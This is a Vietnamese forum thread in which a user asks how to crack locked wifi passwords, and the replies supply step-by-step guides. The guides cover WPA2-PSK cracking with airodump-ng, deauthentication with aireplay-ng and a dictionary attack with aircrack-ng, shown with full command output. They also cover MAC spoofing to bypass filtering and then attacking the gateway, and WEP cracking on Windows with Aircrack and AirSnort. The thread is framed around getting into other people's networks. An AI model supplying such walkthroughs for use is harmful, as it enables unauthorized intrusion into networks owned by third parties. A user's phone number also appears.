Hack wifi

cac bac nao co phan mem hack wifi Em mớimua được cái latop nhưng đi đâu wifi cũng bị khóa hết , bác nào biết cách "bẻ" pass chỉ em với dc ko em tim mai nhung phan mem ko hack dc
 |  Xem: 9.742  |  Trả lời: 6
Ngày gửi: 15/02/2009 - 10:28  |  Câu hỏi liên quan
Trả lời

Danh sách trả lời (6)

Trích dẫn:
hack wifi không phải là không thể được,nhưng tiến trình thực hiện khá phức tạp,mình xin trình bày lại bài viết của pác TranDuyNinh trên diễn đàn HVAOnline (xin lỗi các mod tại ddth nhé!!)
ngày nay ở việt nam wireless ngày càng dày đặc , nhưng muốn dùng thì cũng không dễ , nhất là quân sinh viên chúng ta ,bởi vì đa phần được bảo mật bằng wpa2 hay mac adress limit , bài này sẽ giúp bạn ******** wpa và cách tấn công mac adress , qua đó bạn biết mạng wifi của bạn bị tấn công như thế nào và có cách phòng chống luôn
công cụ dùng trong bài : back track 2 live cd . download :remote exploit forum + google
mac adress của máy tấn công :00:0F:B5:88:AC:82
mac adress của máy trong mạng wifi :00:0F:B5:FD:FB:C2
mac adress của acssespoint : 00:14:6C:7E:40:80
tên của mạng wifi :teddy
Access point channel: 9
Wireless interface: ath0

bước 1 : chuyển wireless card qua chế độ monitor

ifconfig eth0 up
iwconfig eth0 mode monitor

iwconfig

lo no wireless extensions.

wifi0 no wireless extensions.

eth0 no wireless extensions.

ath0 IEEE 802.11g ESSID:"" Nickname:""
Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82
Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3
Retry:off RTS thr:off Fragment thr:off
Encryption key:off
Power Management:off
Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
bước 2 : run airodum-ng để collect authentical :

airodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w psk ath0

*
-c 9 is chanel của network
- -bssid 00:14:6C:7E:40:80 is the access point MAC address.
-w psk file sẽ lưu IVs
ath0 is the interface name.
khi thành công bạn được như sau :

CH 9 ][ Elapsed: 4 s ][ 2007-03-24 16:58 ][ WPA handshake: 00:14:6C:7E:40:80

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:14:6C:7E:40:80 39 100 51 116 14 9 54 WPA2 CCMP PSK teddy

BSSID STATION PWR Lost Packets Probes

00:14:6C:7E:40:80 00:0F:B5:FD:FB:C2 35 0 116


WPA handshake: 00:14:6C:7E:40:80” ở trên cùng nghĩa là airodump đang collect IVs file.

bây giờ thì ngồi đợi nha ( có khi cả ngày ha ha ha )
nhưng cách này sẽ giúp bạn rút ngắn thời gian đợi rất nhiều :
run aireplay-ng để tạo ra nhiều thông tin mã hóa hơn :

aireplay-ng -0 1 -a 00:14:6C:7E:40:80 -c 00:0F:B5:FD:FB:C2 ath0
khi thành công :
11:09:28 Sending DeAuth to station -- STMAC: [00:0F:B5:34:30:30]

sau đó là đợi , càng lâu càng tốt nha
cuối cùng run aircrack-ng để ******** :
aircrack-ng -w password.lst -b 00:14:6C:7E:40:80 psk.cap
psk.cap là file capture ở trên
password.lst : đường dẫn đến file chứa password trong ổ cứng ( có thể là password.txt)
khi thành công :
Aircrack-ng 0.8


[00:00:00] 2 keys tested (37.20 k/s)


KEY FOUND! [ 12345678 ]


Master Key : CD 69 0D 11 8E AC AA C5 C5 EC BB 59 85 7D 49 3E
B8 A6 13 C5 4A 72 82 38 ED C3 7E 2C 59 5E AB FD

Transcient Key : 06 F8 BB F3 B1 55 AE EE 1F 66 AE 51 1F F8 12 98
CE 8A 9D A0 FC ED A6 DE 70 84 BA 90 83 7E CD 40
FF 1D 41 E1 65 17 93 0E 64 32 BF 25 50 D5 4A 5E
2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71

EAPOL HMAC : 4E 27 D9 5B 00 91 53 57 88 9C 66 C8 B1 29 D1 CB

vậy là có thể ******** thành công wpa rồi
lưu ý nếu bước cuối cùng không ra key thì đừng xóa file psk đi nha , copy cất kỹ đi từ từ ******** nha

VỚI MẠNG WIFI BỊ KHÓA MAC THÌ :khi bạn kết nối sẽ không có hiện tượng gì nhưng không kết nối được
muốn vào mạng thì phải thay mac adress của mình cho giống một trong những máy trong mạng đó :
bạn có thể đến gần và coi địa chỉ mac của một máy trong mạng lan đó sau đó đổi mac của mình giống với máy đó thì sẽ vào được , sau khi vào được thì cố gắng xâm nhập vào gateway lấy thêm mac"


Thực ra lúc trước mình tưởng ********/hack wireless khó lắm cơ, nhưng khi thử với blacktrack thì thấy cực kỳ đơn giản. Bạn có thể làm theo như hướng dẫn trên, hướng dẫn trên là dùng blacktrack 2, bây giờ nó có bản blacktrack 3 beta rồi, các bạn có thể lên google search black track 3 là có ngay thôi. Nhớ search dưới dạng file iso nhé, download về chép ra đĩa CD ( làm đĩa boot), chép rồi ra boot từ CD, nó sẽ logon vào màn hình như linux, từ đó bạn tha hồ mà vọc với chỉ dẫn o trên. Mình đã test thử với wireless nhà mình, hiệu quả 100%. Điều chú ý để ******** được pass của wireless thì ******** được khi có máy người khác truy cập vào mạng ( wireless mình muốn hack), nếu ko có ai vào thì đành chịu thôi ( các bạn thử rồi sẽ biết tại sao thôi). Mình có test nhiều tool hack dùng trên window nhưng những tool này chỉ hỗ trợ có mấy loại card wireless thôi, bởi thế khó ******** hơn dùng những chương trình chạy trên CD luôn ( blacktrack, auditor...).

Về thằng Auditor thì mình chịu nó thôi, có lẽ nó chỉ hỗ trợ cho card mạng xài chíp intel hay sao ấy, mình boot từ CD thì ko chịu vào giao diện linux mà làm treo máy luôn. mình đã thử tạo một máy ảo trên window luôn, máy ảo này cài linux Ubuntu 8.04, khi boot từ đĩa Auditor cho máy ảo thì nó có vào được giao diện linux nhưng lại ko nhận được card mạng không dây ( Hình như thằng máy ảo ko nhận card wireless hay sao ấy - mình boot thử blacktrack trên máy ảo cũng ko nhận ra luôn, hjc hjc boot từ máy thật thì nhận được).
Thằng Auditor và blacktrack là mình thấy hack đơn giản nhất ( theo hướng dẫn thôi, mới test blacktrack thôi), mình đang kiếm thử cách cài driver wireless vào Ubuntu mà ko được, anh nào biết chỉ em với ( mới tập tành xài linux nên cũng chưa biết gì, hjc hjc).
Ngày gửi: 15/02/2009 - 10:42
bac oi nhung may em ko co cảd thi lam sao ma dung duoc cach nay the muon mua cảd ay thi minh mua o dau ha bác
Ngày gửi: 15/02/2009 - 10:57
Dùng Aircrack-2.3 Windows (để crack Wireless WEP)

Người dịch: Nguyễn Phương Thảo
148 - Vương Thừa Vũ - Hà Nội
Bài viết cho Trung tâm Tin học ABC

Aircrack là một bộ công cụ làm việc với wireless networks:

# airodump: 802.11 chương trình chụp các gói tin (packet capture program)

# aireplay: 802.11 chương trình nối ghép các gói tin (packet injection program)

# aircrack: công cụ phá khóa tĩnh (static WEP and WPA-PSK key cracker)

# airdecap: giải mã các tệp đã chụp (WEP/WPA capture files)

Cài đặt card (Wireless Card Installation)

1. Download Aircrack từ phần trên hoặc nháy vào đây

2. Đọc các hướng dẫn (README.html) và làm theo. Nó hướng dẫn rất toàn diện.

3. Tôi có 1 card CISCO Aironet 350 và PrismGT card (Corega WLCB-54GT) nhưng chỉ với card CISCO làm việc rất tốt trong Windows. PrismGT không làm việc tốt ở Windows. Aironet 350 làm việc với 11b network.

Làm thế nào để capture (airodump)

1 Tìm WLANs. 0 để chộp giữa các kênh channels.
Trích dẫn:


airodump.exe
airodump 2.3 - (C) 2004,2005 Christophe Devine

usage: airodump [ivs only flag]

Known network adapters:

18 Cisco Systems 350 Series PCMCIA Wireless LAN Adapter
2 Intel(R) PRO/100 VE Network Connection
3 1394 Net Adapter

Network interface index number -> 18

Interface types: 'o' = HermesI/Realtek
'a' = Aironet/Atheros

Network interface type (o/a) -> a

Channel(s): 1 to 14, 0 = all -> 0

(note: if you specify the same output prefix, airodump will resume
the capture session by appending data to the existing capture file)

Output filename prefix -> out

(note: to save space and only store the captured WEP IVs, press y.
The resulting capture file will only be useful for WEP cracking)

Only write WEP IVs (y/n) -> y



2. Từ màn hình, bạn chọn the channel
Trích dẫn:


BSSID PWR Beacons # Data CH MB ENC ESSID

00:0D:0B:98:96:7F 48 2 0 11 54 WEP? 4B18E8C83ABD
00:A0:B0:40:5C:84 87 13 16 1 54 WEP HOGE

BSSID STATION PWR Packets ESSID

00:A0:B0:40:5C:84 00:04:23:52:80:41 86 4 HOGE



3. Nhấn Ctl+c. Tiếp theo ta chỉ capture channel 1 (ESSID HOGE), và mô tả chỉ WEP IVs. Nó cất khoảng trống.

Trích dẫn:



BSSID PWR Beacons # Data CH MB ENC ESSID

00:A0:B0:40:5C:84 87 36 48 1 54 WEP HOGE

BSSID STATION PWR Packets ESSID

00:A0:B0:40:5C:84 00:04:23:52:80:41 87 38 HOGE




Crack như thế nào?(aircrack)

1. Mở 1 new console, và đánh dòng lệnh sau. Aircrack có thể đọc file cập nhật tự động nên bạn có thể chạy run airodump và aircrack đồng thời.
Trích dẫn:



# aircrack.exe -x -0 out.ivs




# Với phải 104bit WEP cần cho 1 triệu IVs. Bạn phải cần 1 ngày hoặc thời gian nhiều hơn để capture đủ các gói. Tuy nhiên nếu bạn sử dụng aireplay bởi airocrack trên Linux và chọn lọc, bạn chỉ cần vài giờ.

# Đây là kết quả. Bạn chỉ cần 1/4 của 1 triệu. Aircrack có thể cũng chạy trên Windows nhưng nó được hỗ trợ không hiệu quả.

(IMG:http://www.grape-info.com/doc/win2000srv/security/images/aircrack02.png)

Nên nhớ: Theo kinh nghiệm của tôi, dùng Aircrack là công cụ tốt nhất so với những công cụ khác. Khi cài đặt ABCWifi, chương trình cũng đã sử dụng phương pháp cho chạy đồng thời nhiều tiến trình này. Chạy riêng Aircrack trên Linux hỗ trợ chộp gói packet ihiệu quả hơn chỉ trong vài giờ. Còn cái khác phải trong vài ngày. (Còn tiếp)
Ngày gửi: 15/02/2009 - 10:57
Đây là công cụ để capture một wireless WEP key.

Cài đặt Wireless Card

1. Download Airopeek Demo (apwdemo.exe) hoặc AiroPeek NX (apnxdemo.exe) và cài. Chắc chắn rằng wireless card đã được hỗ trợ. Bạn nên tìm ở http://ftp.wildpackets.com/pub/demos/.

2. Cài Airopeek Demo, và update wireless card driver của bạn. Theo hướng dẫn ở C:\Program Files\WildPackets\AiroPeek Japanese Demo\Driver\Readme.htm

3. Tôi đang dùng 1 CISCO Aironet 350, nên tôi cần update (downgrade) firmware với version 4.25.30. Tôi download ACU (Aironet Client Utility) và firmware từ CISCO web site. Để download nó, bạn sẽ cần 1 account nên bạn phải register cho chính bạn.

4. Nếu Airopeek làm việc, cái cạc wireless có thể capture các gói wireless packets

AirSnort Installation

1. Download AirSnort từ đây. Tôi đã download airsnort-0.2.7e.tar.gz

2. Extract file đó (airsnort-0.2.7e.tar.gz). Tôi xả nén vào
C:\Program Files\airsnort-0.2.7e

3. Download GTK + 2.4.14 và extract vào

C:\Program Files\airsnort-0.2.7e\gtk+-2.4.14

4. Download Glib 2.4.7 và extract vào

c:\Program Files\airsnort-0.2.7e\glib-2.4.7

5. Download Pango 1.4.1 và extract vào

c:\Program Files\airsnort-0.2.7e\pango-1.4.1

6. Download ATK 1.8.0 và extract vào

c:\Program Files\airsnort-0.2.7e\atk-1.8.0

7. Bổ sung lệnh tìm kiếm đướng dẫn dưới My Computer->Advanced Tab, Environmental Variables, and Path. Bạn nên bổ sung như sau

C:\Program Files\airsnort-0.2.7e\bin; C:\Program Files\airsnort-0.2.7e\atk-1.8.0\bin; C:\Program Files\airsnort-0.2.7e\glib-2.4.7\bin; C:\Program Files\airsnort-0.2.7e\gtk+-2.4.14\bin; C:\Program Files\airsnort-0.2.7e\pango-1.4.1\bin

Chú ý: Không bao gồm bất cứ khoảng trống nào.

8. Copy Peek5.sys và peek.dll từ thư mục của Airopeek (C:\Program Files\WildPackets\AiroPeek Demo) vào

C:\Program Files\airsnort-0.2.7e\bin

9. Download iconv.dll vào Airsnort bin.

10. Download intl.dll vào Airsnort bin.

Dùng như thế naò

1. Bắt đầu captures trong chế độ channel scan (chọn "scan" rồi "channel").

2. Chọn thiết bị Network device và kiểu Driver type. Nếu bạn dùng CISCO, chọn "DWL-650".

3. Click "Start". Lần đầu tiên khởi động, bạn có thể đổi channel mô tả.

(IMG:http://www.grape-info.com/doc/win2000srv/security/images/airsnort01.png)

Còn tiếp (Do máy có các bài và phần mềm này bị nhiễm virus nên khắc phục xong sẽ đưa lên sau)

Theo ý của anh Cường chỉ chia sẻ cho khách hàng mua Laptop mà ABC bán,và cho bạn nào đã giúp ABC ở http://khkt.net/khkt/index.php?showtopic=34394

Nếu bạn không giúp được việc đó thì e rằng sếp Cường chưa thể chia sẻ file cho bạn được, mong bạn thông cảm.
Ngày gửi: 15/02/2009 - 10:58
Lời cảm ơn 3 điểm
Cảm ơn câu trả lời của tellmewhy. a ma bac co so dien thoai ko cho em di co gi ko lam dc em alo cho bac dc ko so en la 0936788687
cac bac oi cho em them kinh nghiem di
Ngày gửi: 15/02/2009 - 11:40
cac bac oi gup em vôi
Ngày gửi: 14/03/2009 - 00:31
Trả lời

Đang được quan tâm nhất

Những thành viên tích cực trong tháng
(1 lượt cảm ơn)
(1 lượt cảm ơn)
(2 lượt cảm ơn)
(1 lượt cảm ơn)
(4 lượt cảm ơn)
(1 lượt cảm ơn)
Quảng cáo
Cucre_hn